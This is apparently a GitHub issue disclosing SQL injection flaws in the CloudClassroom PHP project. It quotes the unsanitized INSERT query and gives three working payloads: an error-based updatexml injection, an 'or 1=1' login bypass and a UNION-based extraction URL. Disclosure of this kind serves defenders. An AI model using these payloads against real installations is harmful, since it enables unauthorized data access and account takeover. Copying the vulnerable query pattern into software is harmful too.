CloudClassroom-PHP-Project icon indicating copy to clipboard operation
CloudClassroom-PHP-Project copied to clipboard

Published 20 hours ago verified publisher icon mathurvishal

SQL Injection

Open carlosalbertotuma opened this issue 4 months ago • 0 comments

Poc 1 - SQL Injection Erro Based

The vulnerable endpoint:

http:///CloudClassroom-PHP-Project-master/postquerypublic

POST: gnamex Original SQL code (from source):

$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

Because the input is not sanitized, attackers can inject SQL like:

a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

Poc 2 - SQL Injection Bypass Authentication

POST /classrooms/loginlinkstudent

Presentation: SQL Injection Bypass Authentication via POST sid parameter

Example vulnerable query (simplified):

SELECT * FROM students WHERE sid = '$sid' AND pass = '$pass'; By injecting SQL in sid, the attacker can manipulate the query logic to always evaluate to true, bypassing login.

Example full POST request (payload URL-encoded):

sid=1' or 1=1-- -&pass=a&login=

Poc 3 - SQL Injection Union Based

GET /classrooms/viewresult.php

By bypassing we can access viewresult.php via GET, the endpoint is also subject to SQL injection, we can extract data via SQL UNION based.

http://URL/classrooms/viewresult.php?seno=%27%20UNION%20SELECT%201,database(),3,4%20--%20-

  • https://github.com/carlosalbertotuma/CLOUD-CLASSROOMS-php-1.0
  • https://github.com/carlosalbertotuma/Cloud-Classroom-PHP-1.0---Poc2

carlosalbertotuma avatar Jul 23 '25 15:07 carlosalbertotuma